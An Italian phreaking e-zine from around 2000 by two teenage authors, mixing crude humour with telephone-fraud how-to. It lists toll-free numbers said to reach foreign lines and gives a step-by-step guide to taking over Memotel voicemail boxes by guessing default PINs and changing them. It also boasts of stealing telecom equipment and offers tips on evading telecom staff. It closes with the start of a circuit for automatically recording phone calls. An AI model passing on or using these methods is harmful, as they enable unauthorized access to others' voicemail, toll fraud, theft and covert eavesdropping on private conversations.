Guns 'n' Roses (ha detto bIs0n che vuol dire Pistole e Rose)
{ The Garden
Korn { Falling away from me, Freak on a Leash (immancabile)
HIM { Join me (in death) (da dedicare ad una ragazza)
(ha detto bIs0n che vuol dire Raggiungimi nella morte)
David Bowie { The man who sold the world
(ha detto bIs0n che non la sa tradurre)
Green Day { Take Back (Piaceva tanto a W.C.)
Led Zeppelin { Black Dog
(ha detto bIs0n che vuol dire Cane Nero)
Cannibal Corpse { Pounded into Dust
(da dedicare ad una ragazza pure questa)
Nirvana - Nevermind
Bene, abbiamo finito l'articolo... skerzo...
Saluti mR_bIs0n: Panino, Biby, quel gran fijo de 'na mignotta de Pankrazio
\z0KA\, ]]SPYRO[[, zio'sP3nK, Maggioran, [Trunks], BsTHaCk,
|m-max|, galbix'2k, XaRaBaS
Saluti Mr_Skull: Paniiiiiino, XaRaBaS, Peppo Cadavere, Pankrazio,
Gianni Cavalieri, Mupphy...
Fax (si scrive fucks): Amicus (come da rito), poing (idem, si scrive proprio
con la 'p' minuscola), Alessandro Ceino (visitate il
sito www.ceino.8m.com), Giorgio Qulo, il Preside,
Alessandro L. (aka Axel ma solo per dare fastidio)
mR_bIs0n: Credo che abbiamo terminato...

-----------------Indice:

-1) Come nasce Green Phreak on a Leash
0) Disclaimah
1) Green Phreak on a Leash 2 - Ritorno su Marte
2) Qualke numero per gli scettici...
3) Robberia a Telecom
4) La disperazione di ieri sera di mR_bIs0n...
5) L'anarkia del cugino di Mr_Skull...
6) Finale

----------------- -1) Come nasce Green Phreak on a Leash

Questo Š un piccolo log tra mR_bIs0n (chi Š?ndMr_Skull) e il suo amico \zOKA\
(invertite le sillabe e si legge kazzo.ndMr_Skull) attualmente chiamato
brother// (ha fatto bene a kambiare nick...ndMr_Skull):

<\zOKA\> we, ti volevo chiedere una cosa
<mR_bIs0n> uelllllaaaaa kome va? spara
<\zOKA\> gr33n phr3al 0n a l3ash
<mR_bIs0n> il seguito esce frampo'
<\zOKA\> di cosa parla? ( ho capito, green, ma in che senso )
<mR_bIs0n> allora
<mR_bIs0n> diciamo ke Š un'artikolo [notate l'apostrofo ndMr_Skull] ke tratta
di phreaking
<mR_bIs0n> in partikolare di green...
<\zOKA\> ...fin qua ci arrivavo pure iol... [pubblicit… okkulta ndMr_Skull]
<mR_bIs0n> infatti ogni anno io skopro nuove kose sui green
<mR_bIs0n> 1999) esistono segreterie su numero verde exploitabili
<mR_bIs0n> 2000) esistono numeri ke dirottano le kiamate da una parte
all'altra del globo
<mR_bIs0n> 2001) esistono altre forme di vita intelligenti nell'universo ke
sono appassionati della Melevisione
<\zOKA\> ahahahahahahahahahahaahahahah
<mR_bIs0n> poi tutte le informazioni sono shakerate kon un mix
comiko-demenziale anke kon l'aiuto di Mr_Skull
<mR_bIs0n> ekko kome nasce Green Phreak on a Leash

-----------------0) Disclaimah

La lettura di questo articolo potrebbe essere pericolosa per la vostra sanit…
mentale e oltre. Quindi se registrate i seguenti sintomi: voglia di emularci
(il pi— grave), disturbi psicosomatici (se sapete cosa vuol dir scrivetecelo),
disturbi visivi, voglia di uccidere Fiorello (conduttore tra l'altro del
Festivalbar, terribile esaltazione di musica commerciale che si pu• ascoltare
solo per un mese perch‚ poi passa di moda)... e altri non segnalati,
INTERROMPETE SUBITO la lettura e consultate il medico di fiducia.

Inoltre se in quest'articolo ci sono cose che sono contrarie alla vostra etica
non ce ne fotte un cazzo, per• sfrizionate la capocchia come un fiammifero e
gettare IMMEDIATAMENTE per terra, allontanandosi VELOCEMENTE!

-----------------1) Green Phreak on a Leash 2 - Ritorno su Marte

Mr_Skull: Buonasera, siamo tutti qui riuniti per celebrare l'uscita di Brave
New World, il nuovo album degli Iron Maiden (your time will come....). Ah,
dimenticavo, Š tornato Bruce Dickinson.
mR_bIs0n: Ma tu le pubblicit… le sai tutte a memoria?
Mr_Skull: solo quella degli Irons! Ma non mi faccio mica influenzare dalle
pubblicit…, infatti ho subito comprato Brave New World...
mR_bIs0n: Rimanendo in tema, vi Š mai capitato di incontrare un amico poco
sveglio che vi informava:
A.P.S.: "
Ce uŠ sienti lu nummuru ti l'effebbiai?"
(trad. "
Salve oh Straniero, potrei avere il piacere di domandarLe
se di grazia vorreste essere deliziato nell'udire la soave voce di
un intrepido e valoroso agente dell'FBI? Oppure dovete andare a
desinare?")
se non vi Š mai capitato, il numero non ve lo daremo certamente noi...
Mr_Skull: Quale numero, quello 800-874091, ke mi avevi assikurato di non dire
ad anima viva?
mR_bIs0n: Povero demente... Visto che ormai una spia segreta ve lo ha rivelato
tento di abbozzare una teoria malsana...
Mr_Skull: ...degna della figlia stordita (di PUTTANA!ndmR_bIs0n) del tenente
Colombo...
mR_bIs0n: no, su come succeda tutto ci•...

/- * - * -\ /- * - * - * - * - * -\
| | | | | U | | S | | A | |
* - * - * - * * - * - * - * - * - * - *
| | | o-------------------------------o | | | E | | |
\- * - * -/ * - * - * - * - * - * - *
Rete telefonika | | g | e | t | t | a |
Italiana(?) \- * - * - * - * - * -/
Rete telefonica USA

o = buco (del culo!ndMr_Skull)

tutto ci• Š confermato dal fatto ke se provate altre kombinazioni di numeri:
800-874093
800-874194
rispondono altri numeri, e se ne fate uno sbagliato la mignottella della
Telekom Amerikana vi dir… ke Š sbagliato in amerikano...
Mr_Skull: Miiiiinkia, allora io posso chiamare ad una mia "
amica" che sta in
america ('a' minuscola perch‚ l'america fa skifo)!!!
mR_bIs0n: Teoricamente si, perch‚, hai una "
amica" americana?
Mr_Skull: no.
mR_bIs0n: :-2(|ATDP800-874093 (faccia perplessa), ogni giorno mi stupisci
sempre di pi— [e si mette a canticchiare Lithium perch‚ ha subito un danno
tentando di capire la mentalit… contorta di Mr_Skull, e ora legge il
libretto di Brave New World...]
Mr_Skull: BE? DATTI UNA FOTTUTA MOSSA
mR_bIs0n: ah, occhei, potete provare molte volte, provando combinazioni
diverse (800-87****), incappare in numeri con operatori che vi rispondono:
Hello, I am Asdrubale (nome tipicamente americano...ndMr_Skull), can I help
you?
Mr_Skull: Hello Asdrubale, I wanna tell ya that I've fucked your momma...
mR_bIs0n: secondo la mia teoria, la nostra chiamata dovrebbe essere,
ipoteticamente, "
fantasma", e ci• vuol dire che gli amicici americani non
possono sapere da che numero chiamiamo... tutto ci• ipoteticamente perch‚
infatti standomi a chiamare miliardi di volte il povero agente Molder
dell'FBI, non mi sono venuti ad arrestare a casa. OK, per ora questo Š tutto
amici, vi faremo sapere.
Mr_Skull: Grande Garelli, piccola solo nel KAZZO!

---------------2) Qualke numero per gli scettici..

Allora, qualke pezzo di merda kome voi non krede a quello ke stiamo dicendo?
Brutti bastardi figli di puttana? Ora, cordialmente vi illustrer• qualke
numero ke vi pu• piacere...

Rispondono societ… telefonike
800-874444 - Giappone
800-876590 - Amerika
800-874469 - Italia!!!

Rispondo varie kose divertenti
800-874091 - Oramai la konsueta F.B.I.
800-876559 - C'Š uno ke risponde: "
Ambalalaila"
800-875045 - IBM Italia
800-874011 - Bank Of Amerika
800-874019 - Risponde una francesina (Par Ble! :))

-----------------3) Robberia a Telekom

C'era una volta... ma poi l'hanno abb

  
attuta perch‚ era in pericolo di krollo.
Una bella serata o di Pasqua, o di Pasquetta, o forse di Pasquale, il prode
giovincello mR_bIs0n si avvicina a kuell'altro prode violoncello di Mr_Skull
e gli dice:
<mR_bIs0n> WŠ, hai qualcosa da fare?
<Mr_Skull> Ero intento a skakkolarmi, ora molto arrogantemente mi hai
interrotto, torna pi— tardi
Un'ora dopo:
<mR_bIs0n> Skusi, di Grazia, posso disturbarLa?
<Mr_Skull> Veramente, vostra signoria, io sarei lieto di essere intrattenuto
da Voi ora che ho finito il mio soave scaccolamento quotidiano, ors—,
parlate!
<mR_bIs0n> Dobbiamo prepararci per questa sera...
<Mr_Skull> (voce castrata) Cosa dobbiamo fare questa sera, Nakkio!!!
<mR_bIs0n> quello che dobiamo fare tutte le sere, Skully
<Mr_Skull> (voce castrata) e cio‚ Nakkio!!!?
<mR_bIs0n> tentare di scoparci una puttana.
Che coppia! Che scoppia!
<mR_bIs0n> scherzi a parte, io direi di andare a fottere qualcosa alla telekom
<Mr_Skull> in quella sede dove le auto sono parcheggiate oltre ad una
recinzione di m 0,002 in quel quartierotto pieno di delinquenza e di
prostituzione dove abiti tu?
<mR_bIs0n> esattamente!
I due fanciulli si inkamminano verso quel quartiere malfamato e, dopo ben
quattro magnaccia che gli hanno dato l'elenco di ben 35 diverse prostitute
tutte per• mutilate o orbe oppure travestiti, e dopo ben 23 spacciatori
che hanno tentato di vendergli dal semplice fumo fino all'eroina (attenzione
con l'eroina, a lungo andare pu• portarvi alla mariuana!), i nostri arrivano
alla sede telekozza... Descrizione:

* recinzione alto voltaggio, che gli omini telecom hanno disattivato perch‚
3 di loro sono morti prendendo la scossa, alta quasi 2 metri, senza
bordini neri indelebili
* enorme parcheggio pieno di Panda degli omini telekom privi di bordini
neri indelebili
* un ufficio che non ci interessa perch‚ Š chiuso e gli mancano anche i
bordini neri indelebili
TECNICAAA 1
SCATOLAAA 1
PERFORMAAANS 1
GLOBAAAALEEE 0
VALUTAZIONEEE assolutameeente poooco
professionaaaaaaaaaleeeeeeee!

<Mr_Skull> Skusa, ma sekondo te quelle auto le lasciano aperte
<mR_bIs0n> beh, trattandosi di omini telekom lobotomizzati... su 10 una aperta
ce ne sar…...
<Mr_Skull> GGGIUSHTO!
<mR_bIs0n> Ora che non passa nessuno, scavalchiamo, tu fai il palo...
I due scavalcano, e mentre il baison cerca di trovare un cofano aperto, skull
fa il palo avvisando diverse volte il passaggio di auto o persone... ad un
certo punto:
<mR_bIs0n> EUREKA! (e corre nudo in mezzo alla strada ndMr_Skull) Quest'auto
Š aperta!
Ma, mentre il baison cerca fra le cianfrusaglie il fottibile, passano 3
vecchiette mutilate ex-prostitute che tornano dalla messa... Skull in preda
al paniko non sa come avvisare l'amico del pericolo incombente: infatti
quel birichino del mR_bIs0n si alza con degli aggeggi in mano e grida:
<mR_bIs0n> WE! UNO CIASKUNO!!!
e in quel momento un infarto colpisce il kuore di pietra di Mr_Skull, che
per• ne fa volentieri a meno. Per fortuna anche se non erano orbe, le vecchie
puttane erano sorde perch‚ parecchi clienti, al loro tempo, sborrarono nelle
loro orecchie, incrostandone i timpani.
Superato l'inconveniente i due tornano a casa con i seguenti aggeggi:
un telefono speciale con delle alligator clips, ed uno STIM/PLUS giallo usato
dalla maggior parte degli omini telekom come sistema di accesso ad un
database, che studieremo pi— avanti.

THE END

-----------------4) La disperazione di ieri sera di mR_bIs0n...
Ieri sera (Sabato) ero felice e trotterallavo, fermandomi spesso ad annusare
i fiorellini, quando mi fermo a parlare kon un mio amiko... ad un certo punto
arrivano due tipe ke mi dikono:
- Scusa mi avevano detto ke tu eri FROCIO!!!
La disperazione avvolge il poverino ke si akkascia a terra, stekkito.

Lettore: per favore, te lo kiedo per favore, non blaterare kavolate senza
senso, era inutile dircelo, non ha nessuna attinenza kol phreaking...
mR_bIs0n: si ma dovevo pur dirlo a kualkuno...

-----------------5) L'anarkia del cugino di Mr_Skull...

Mio cuggino Š un bambinetto pervertito, dolce, e anarchico.
Infatti, per protestare contro i suoi familiari, ha dei trucchetti che possono
essere definiti anarkici:

1) Quando mio padre ara la terra con il motozappa, lui seppellisce lungo il
percorso una bottiglia di plastica piena d'acqua, che ingrippa le ruote del
motozzappa scoppiando in uno spruzzo d'acqua che potrebbe causare il
malfunzionamento del motozzappa stesso
2) Invece prima che mio nonno (che Š CIECO) scenda le scale, sistema
amorevolmente e accuratamente delle automobiline sugli scalini, sperando che
mio nonno cada.
3) Quando con i genitori vanno in qualche negozio, ruba.
4) Scoperta la cassetta dei risparmi di mio nonno (quello cieco), ne detrae
œ 50.000 alla volta (tipo quei bravi ragazzi che fanno volontariato assistendo
i vecchi e gli inabili e si comprano la droga con la pensione di anzianit…
o invalidit…)
5) Quando non pu• avere le figurine dei Pok‚mon (il mio preferito Š Figachu)
che hanno i suoi amici e a lui mancano, gliele ruba.
6) Fa saltare in aria i vetri dell'auto di mia zia attaccando un cosiddetto
"Minicicciolo" sul finestrino e avvolgendola con 3,125 + o - 0,001
7) Vende la frutta del suo giardino a œ 2.000 all'assaggio.

Con questo Š tutto.

-----------------6) Finale

BENE: ANCHE PHREAK ON A LEASH II  GIUNTO AL TERMINE...
<mR_bIs0n> Skull, hai dimenticato il caps lock!
AH, SI, LO TOLgo subito. Dicevamo, siamo giunti alla fine. Speriamo che questo
seguito sia stato all'altezza del suo predecessore (speriamo di no cos non
dovremo per forza scrivere la 3 parte). Speriamo che un domani ci sar… un modo
per telefonare senza pagare...
<mR_bIs0n> Esiste gi… skull, col nopay o con picus, ma quest… Š un'altra
storia
<Mr_Skull> si, una storia che per• non funziona per niente...
Dicevamo, senza pagare, cos il mio amicone Giorgio Qulo non ricever… pi—
sborrett... ehm, sboll... bollette stratosferiche con chiamate in Papua Nuova
Guinea per colpa delle linee erotiche ma soprattutto per le dimensioni molto
ridotte del suo cervello e del suo pene.

Da Marte Š tutto. Ma io so anche cantare. Giro giroo toondooo, caaascaaaa
iiiil mooooondooooo, caaaaaascaaaaooo laoooo tuuuuuuuuuruuuuuuuuuuuuu.
<mR_bIs0n> Okay HAL, possiamo uscire dalla tua cameretta che nei giorni
feriali Š talmente sporca che sembra il suolo marziano?
<Mr_Skull> vabbene, possiamo.

Qui Marte, a voi Terra.
mR_bIs0n & Mr_Skull.


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º º
º SCEMO CHI LEGGE º
º º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ










State ancora leggendo??? Ciao. Andatevene a caccia di tesori.

_.-^-._.-^-._.-^-._.->La favoletta di MotorJovy e mR_bIs0n<-^-._.-^-._.-^-.

C'era una volta, tanto tempo fa, ma cos tanto (ieri), un fanciulletto dal
soave nome di mR_bIs0n, con le gote rosse e i capelli d'oro che viveva da
solo con sua madre, suo padre, suo fratello e gli inquilini della porta
accanto (solo!ndMr_Skull).
Un bel d la madre gli disse:
-Cappuccetto Baison!!!
-Mamma, Š scritto male!
-Ah, si scusa tesoro... senti, vai perfavore a portare questo cestino di
Kalashmikov (si scrive cos?) alla nonnina, che la notte scorsa ha bevuto
troppo e ora le gira la testa...
-Un minuto ma'
-Muovi immediatamente quelle fottute chiappe da quel cazzo di sedia o prendo
la scopa
-Quella elettrica?
-Obbedisci! E stasera a letto senza cena
-Meglio (nel comodino ci• tanto di quella roba: sukki di frutta, nutella...)!
-E mi raccomando, non passare per la villa che c'Š il lupo cattivo e
soprattutto ci sono le squadracce Telekom!
-Ok ma!
Ma il nostro mR_bIs0n voleva passare per la villa a sputare i vecchietti sulle
panchine. Nel mezzo del cammin di nostra vita, per•, sent un rumore
assordante... era il MotorJovy con il suo scooter supertruccato...
MJ-TS
MotorJovy TrucchescionScuter - Messa a punto parti:

MBK-Nitro

* Marmitta Polini "Evoluzione" con silenziatore con bordini neri indelebili
* Carter da corsa "Top Performance" con bordini neri indelebili
* Cinghia da corsa super-resistente con bordini neri indelebili
* Asportazione del classico cavalletto per maggiore stabilit… e tenuta in
curva (in realt… dava fastidio al silenziatore della marmitta)
* Cavalletto tipo "125" con bordini neri indelebili
* Carenatura nuova di zecca con bordini neri indelebili
* Centralina per la regolazione della candela con bordini neri indelebili
* Super adesivato con bordini neri indelebili
(Š tutto professionaaaaaleeeee!ndPastore)(SBONK!ndBovas)

-mR_bIs0n: MotorJovy! Cosa ci fai qui!?
-MotorJovy: Mah!
-mR_bIs0n: io sto andando dalla mia dolce n1onn...
-MotorJovy: guarda! Quella cabina Š aperta
-mR_bIs0n: diuao! Andiamo a vedere!!!
I due si avvicinano alla cabina
-MotorJovy: smontiamola!!
-mR_bIs0n: aiutami... hai un cacciavite?
-MotorJovy: Un coltello... vabbene ugualmente? asp‚ che lo prendo...
(Traffica nelle mutande)
-MotorJovy: eccolo
-mR_bIs0n: cavolo, ‚ piccolo... ma mi accontento comunque... ne hai anche uno
a croce???
-MotorJovy: asp‚ che vedo...
(Altro traffico)
-MotorJovy: eccolo!
-mR_bIs0n: smonta il tastierino che io penso al rotor...
-MotorJovy: a che???
-mR_bIs0n: fai, fai...
I due si mettono a praticare...
Sul display della cabina appare dapprima "FS" e poi scompare...
-Cabina: Beep beep beep beep beep
-MotorJovy: che cazzo Š???
-mR_bIs0n: cavolo!!! sta segnalando manomissione alla centralina!!!
Sbrighiamoci!!!!
Finito di smontare il rotor, il nostro eroe e il suo amico vanno verso lo
scooter
-MotorJovy: Asp‚ che metto il tastierino sotto il sellone... Dammi che metto
il rotore... mo'... il coso!
-mR_bIs0n: Ok tieni, ma sbrigati!
-MotorJovy: Cavolo! Non entra!!!! Misterba', prendilo in mano e sali dietro
lo scooter con me...
-mR_bIs0n: OKkazz0...
BROOOOOOOOOOOOOOUUUUUUUUUUUUUUUNUUUUUUUUOOOOOOOOOGROAHNNNNNN
I due si lanciano in una folle corsa per le strade di Manduria con il rotor
ben in vista...
Arrivano a casa di MotorJovy sani e salvi, lasciano la refurtiva nel garage.
E, come si dice in questi casi, vissero per sempre felici e contenti...

THE END

Casa mR_bIs0n

Telefono: Driiiiiing
mR_bIs0n's Mum: Pronto, chi parla???
mR_bIs0n's Grandmother: Angelaaaa, il Baison non mi ha portato il cestino di
Kalashmikov!!!
mR_bIs0n: nonna, non Š scritto bene!
mR_bIs0n's Grandmother: ah, scusa...
Mr_Skull: vabb‚, tutto Š andato per il meglio, per• ricordate:
MADRE GODURIA  SEMPRE IN CULO A LORO!!!
mR_bIs0n: Sei sempre il migliore a sparare cavolate...

_.-^-._.-^-._.-^-.->Come si usa e abusa di una segreteria Memotel<-.-^-._.-^-.

Artikolo scritto interamente e solamente da mR_bIs0n con l'approvazione di
Mr_Skull

Memotel?

Un po'di anni fa alla telekaxx, gli venne in mente la brillante idea di
creare una segreteria "CON LA SEGRETERIA GIA' DENTRO AL TELEFONO!!!" (cos
sponsorizzavano la novit… sulle skede telefonike...).
Bene, in poke parole per averla bisogna chiederla direttamente alla telekaxx
e vi verr… attivato il servizio, infatti non Š una segreteria fisica con
cassetta ect...
Se ne avete scoperta una, o su numero verde, o su di un normale numero, bene...

Cosa dobbiamo fare?

Per prima cosa, quando parte la voce registrata, voi premete "#", vi verr…
chiesto un codice ke di solito Š "1234"... se non Š cos, allora provate
numeri come "5555" o "9876" o roba simile... la gente Š molto stupida...
quando avete finito di digitare dovete premere di nuovo "#".

E una volta entrati?

Bene se avete azzeccato il codice una voce registrata vi informer… se sono
presenti nuovi messaggi o precedentemente ascoltati... il men- vi si
presenter… in questo modo:

Tasto Azioni e scelte varie
-1- Per ascoltare i messaggi:
-7- per cancellare il messaggio ascoltato
-9- per archiviare il messaggio ascoltato
che verr… rimosso solo dopo 15 giorni dall'archiviazione

-2- Per accedere al men- opzioni:
-1- per cambiare il codice di identificazione personale
bisogna immettere il nuovo codice e poi ripeterlo per
conferma
-2- per scegliere i messaggi di presentazione
-1- per i messagi pre-registrati
-2- per registrare il messagio di presentazione
che avverte che il numero chiamato Š occupato
-3- per registrare il messagio di presentazione
che avverte che il proprietario del numero
chiamato non pu• rispondere
-4- per registrare il messagio di presentazione
che avverte che il proprietario del numero non
Š al momento raggiunguibile
-3- Per uscire dalla segreteria.

-*- Per uscire da qualsiasi men- in cui vi trovate.

Cosa ci consigli di fare?

Bene, per prima cosa chiamate sempre da una cabina (io lo faccio nel 50% dei
casi, Š molto pi- comodo chiamare dal salotto di casa ma molto pi-
rishioso... io amo il pericolo...), cambiate per prima cosa il codice di
identificazione (usatene uno molto difficile e cambiatelo spesso), lasciate
dei vostri messaggi registrati, magari sputtandando qualcuno (io l'ho fatto!!!
EHEHHUHUHIHIH), registrando con degli amici, oppure vantandovi di aver
fottuto la segreteria e mandando al diavolo chi chiama...

Bene, mR_bIs0n, ora non ci servi pi-, ti abbiamo solo usato... Bob (c'Š
sempre un Bob) fallo fuori...

EHEHE ke cavolicchio vuoi fare con una Condor (per gli eretici, pistola
giocattolo ad aria compressa con proiettili di 9mm, che di solito fanno male
ma non provocano la morte...)... UAHAHUAHAH (risata ke peggiora l'insulto)...
spara spara spara demente...

Scar scar Can you feel my power?
Shot here and the world gets smaller!
Scar scar Can you feel my power?
One shot and the world gets smaller!
Scar scar Can you feel my power?
Shot here and the world gets smaller!
Shot Shot Shot MotherFucker!
Shot Shot Shot MotherFucker!
Shot Shot Shot MotherFucker!

Grabbato dalla canzone "Reflective God"
dell'album "Antichrist SuperStar"
di Marilyn Manson (anno 1996)

mR_bIs0n

_.-^-._.-^-._.-^-._.->Due parole sulla pericolosit… dei green<-^-._.-^-._.-^-.

Artikolo scritto interamente e solamente da mR_bIs0n con l'approvazione di
Mr_Skull

Ci sono tante persone (parekki finti phreaker) ke si buffoneggiano dicendo:
"Uhuh... greenz, ahah ci si fa male con le proprie mani..." Ecco! Cafoni del
genere pensano ke i green siano solo i numeretti magici della CIS ke
permettono di navigare gratis... coglioni... nemmeno io userei un green
illegale... i green sono soprattutto dei numeri gratis (effettuabili anke da
cabine senza monete o skede) ke permettono di fare tante kose sfiziose a
danno della Telekaxx o ad altre societ… private... tutto ci•, se fatto da una
pubblica cabina telefonica Š sicurissimo... io da un sacco di tempo provo
tanti green e non mi Š successo mai nulla... Mettiamo ke la centrale telekozz
della tua citt… si accorga ke qualkuno stia facendo delle kiamate a numeri
verdi non consentiti e ke mandi una squadra di Omini TeleGum ke ti vedono
lavorare nella cabina... cosa vuoi ke facciano? Ti ammanettano? TI torturano?
Ti uccidono? Niente, non possono farti un bel niente!!! Non possono sapere
con certezza se sei tu il mascalzone, se stai facendo qualke prova sui green,
o se stai facendo una normale kiamata... e se ti prendono (cosa altamente
improbabile) puoi smentire comunque subito:

-Possibilit… 1-
Omino Telekazz: Cosa stavi facendo nella cabina???
TU: Io? Io? Io sono appena arrivato! Stavo per kiamare a mamm…!
Ed ho aspettato ke se ne andasse l'okkupante di prima...

-Possibilit… 2-

Omino Telekazz: Cosa stavi facendo nella cabina???
TU: Ke cavolo ti interessa? Sono fatti miei!
Omino Telekazz: Tu stavi facendo dei numeri verdi non consentiti...
TU: Ah? Kosa sono? Io stavo solo scrivendo a kazzo dei numeri!
Omino Telekazz: Bene non farlo pi-!
TU: (alzando il dito medio) FOTTITI!

-Possibilit… 3-
Omino Telekazz: Cosa stavi facendo nella cabina???
TU: Niente di particolare, stavo solo utilizzando un numero verde per kiamare
in America senza spendere un soldo... perkŠ a te kosa interessa? Se vuoi
te lo insegno...
(Vi sconsiglio di usare questa scusa...)

Quindi non vi preokkupate se state provando dei green... non vi cagate
addosso... io un giorno stavo controllando i messaggi di una segreteria su
green, e affianko all'altra cabina c'era un Omino ke stava riparando una
cornetta... gi… ke stavo gli ho fottuto un po'di filo telefoniko dalla
cassettina ke aveva... EHEHEHEHEHEH!!!

Cmq vi devo dire di stare alla larga di certe persone ke blaterano: "EIIII!
Andiamo alla cabina ke adesso devo kiamare in America con un numero verde..."
Al massimo pikkiatelo!

mR_bIs0n

_.-^-._.-^-._.-^-._.-^-.->Come si deventa phreaker o quasi<-.-^-._.-^-._.-^-._

Artikolo scritto interamente e solamente da mR_bIs0n con l'approvazione di
Mr_Skull

Questo art non Š uno quei soliti art dei grandi hacker, ke sputtanando i
lamer, spiegando chi Š un hacker... ma bens spiego come fare per essere
o diventare, non dico un phreaker (altrimenti kissa quanta critika) ma uno
ke si diverte tanto ai telefoni! Bene, in Italia se non fai brute forcing, usi
per forza green... boxare Š impossibile ed anke volendo, difficile...
Bene i green sono semplici e divertenti, e almeno a me non fanno paura, e
chiunque pu• dilettarsi... bastano una cabina e un interessato che abbia
almeno un dito utilizzabile...
Io almeno ho iniziato cos, mi diverto tutt'ora e ora non mi definisco un
phreaker (sempre per la critika... e allora, cara critika, dimmelo tu ki
kazzo sono! Ah, dimmelo ki sono, un bastardo ke apre kabine, prova green e si
diverte... allora dimmelo, siccome phreaker non sono, kosa kazzo sono! *
Scusate per lo sfogo!*), e ho una buona conoscenza di ci• ke si pu• fare con i
sistemi telefonici (sbaglio o questo Š phreaking?).
Bene, io avevo appena 14 anni quando ho iniziato, ero un ragazzino curioso,
e quando uscivo la sera con gli amici provavo, cos per giocare, dei numeri
verdi tipo: 16756565 o 167454545, e pian piano scoprivo nuove cose, ne
parlavo su IRC con gli amici... ankora faccio allo stesso modo, e soprattutto
mi diverto e con me anke i miei amici (ke risate quando registravamo messaggi
di benvenuto con i miei amici ad una segreteria su green...).
Quindi, ki Š davvero intenzionato a diventare phreaker non si spaventi
quando una signorina al telefono dice: "Inserire codice prego" e riattakki,
ma provasse "1234" oopure "0000" e sentire cosa risponde!

mR_bIs0n

_.-^-._.-^-._.-^-._.-^-.->Consigli vari e forse utilie<-.-^-._.-^-._.-^-._.-^-

Vorrei consigliarvi qualkosa da fare per farsi "na ccultura" nel phreaking...

Da leggere:
- L'elenko telefoniko Telekazzarola ke ci sono tante cose interessanti da
leggere e qui vi riporto un passo:

Carte Telefoniche
Scheda Telefonica Prepagata

[...]
La richiesta di sostituzione della scheda non utilizzata e provvista del
talloncino di sicurezza deve essere rivoltata alla Filiale Telecom di
competenza che fornir… anche ogni opportuna informazione relativa
all'eventuale malfunzionamento della scheda.

Bene, ditemi ora come KAZZO faccio a vedere se la maledetta skeda funziona
o no se deve essere per forza provvista di talloncino... vado ad intuito
forse...

- Telefonia generale, un librone ke pu• essere facilmente fottuto in una
qualsiasi centrale TeleFuck...

- Prendersi i cataloghi G.P.E (www.gpekit.com) ke vendono dei bei kit di
montaggio (es. Centralino telefonico, Microtrasmettitore per la
trasmissione di conversazioni telefoniche... e tante altre cose sfiziose)

- Qualsiasi cosa parli di telefonia e elettronica... riviste, opuscoli...

- Urbis et Orbis, il mio libro di Latino ke konsiglio di leggere ma non
centra comunque un cazzo...

Da fare:
- Crearsi un gruppo di amici fidati, per lavorare insieme... Š molto pi-
divertente, almeno secondo me... (il fatto sta ke io lavoro ankora solo...)

- Procurarsi un cellulare ke Š molto utile, (non intendo dire di mandarsi
squilli, messaggini amorosucci, con amikette e fidanzatine, cuoricini e
fiorellini... e nemmeno per mettersi a dire in giro: "Oki Walter, comprane
10.000 e vendi tutte quelle azioni ke sono al di sopra di..." perkŠ Š da
dementi...) infatti e comodo per fare chiamate a green e altro...

- Visitare le centrali Telesuck per grabbare tanta robba!!!

- Trovarsi una ragazza (anke brutta, bha contenti voi!), ke vi consoli se vi
hanno tolto la segreteria su green ke utilizzavi a sbafo!

- Indire una conferenza

Phreaking in Italia e l'ambiente CyberPunk
Tenuta dal professore mR_bIs0n e dall'esperto Mr_Skull
Ingresso gratuito
Salone delle conferenze del Municipio
1
- Crearsi una radio pirata per distribuire informazioni sul phreaking

mR_bIs0n

_.-^-._.-^-._.-^-._.-^-._.-^-.->Saluti vari<-.-^-._.-^-._.-^-._.-^-._.-^-.

Questa lunga e pesante deliriata si Š conclusa, se vi piace fateci sapere...
ma comunque non ce ne "futta" nulla... eheheh

Comunque sentirete parlare di noi presto con nuove riviste e guide... forse un
giorno o l'altro vedrete in prima pagina de "la Repubblica": Ragazzo 15enne
arrestato per molestie sessuali ad una ragazza 27enne... e non sar… il caso
mio (mR_bIs0n) (sto aspettando da un sacco di tempo una pedofila sui 20 anni
che mi molesti sessualmente!!!) ma se guardate pi- basso forse noterete:
Ragazzo 15enne arrestato per danni alla TeleCom Italia...

VabbŠ ora un po'di saluti (solo di mR_bIs0n... Mr_Skull non ama i saluti...):

Vorrei salutare alcuni miei amici e compagni di skuola (e non solo...)

- Davide, il mio amikone (anke kiamato Panino, per via della sua rotondit…)
con il quale trascorro il tempo sfottendo varie persone... risate
assicurate...

- Giorgio, una vittima dei nostri insulti... un tipo assai divertente...

- Federika, forse la mia unika amika in classe... spesso parliamo del suo
ragazzo, spesso di cazzate...

- Gabriella, una tipa a cui ho insegnato a kome usare il suo Siemens C25...

- Marco, l'uniko in klasse a soppravvivere ogni giorno senza aver fatto i
compiti assegnati...(nonkŠ mio kompagno di banko... eheheh uso sempre il
suo StarTak nell'ora di Religione...)

- Peppo, anke konsciuto kome Giusy, un tipo prepotente ma divertente...

- Ilaria, una ragazza di 1øanno (io so' di 2ø!!!) co capelli rossi, ke oggi
ha detto ke non sono il suo tipo... se ne pentir…!!!

- Elisa, una mia amika, una delle pi- belle ragazze ke io abbia mai
conosciuto...

- Le Iene!!! Si proprio quelle di Italia Uno!!! Siete fantastici!!!

- Il minikaktus ke mia quella scoppiata di mia madre ha messo sulla case del
PC... ma ke kaxxo mi centra???

Dedicato a (sempre e solo mR_bIs0n...):

Daniela, l'unika ragazza della mia vita...
EI! Non fraintendete! Non Š la mia unika ragazza in senxo di fidanzata...
Veramente non Š nemmeno la mia ragazza... comunque kiss…...

[ mR_bIs0n & Mr_Skull ]

.--------------------------------------------------[ biGbRotHer InSide ]-----.
| CIRCUITO PER L'AUTOMAZIONE DI REGISTRAZIONI TELEFONICHE |
*--------------------[ WaVer's heavy industries ]--[waver@technologist.com]--*

Con questo semplicissimo schema elettrico (ndr: allegato "tel.gif")
è possibile costruirsi un circuito in grado di pilotare direttamente un
normale registratore a microcassette per registrare le conversazioni sulla
linea telefonica a cui è collegato. Ogni qualvolta sarà alzata la cornetta
del telefono collegato alla linea il registratore entrerà in funzione
registrando ogni cosa (compresi i toni DTMF) fino a che la cornetta non sarà
abbassata.
Il registratore da utilizzare deve essere munito di presa Remote e di
un'ingresso Micro. Ovviamente l'uscita LINE OUT andrà collegata
all'ingresso del registratore mentre i contatti del Relè andranno
collegati alla presa Remote del registratore che dovrà essere posizionato
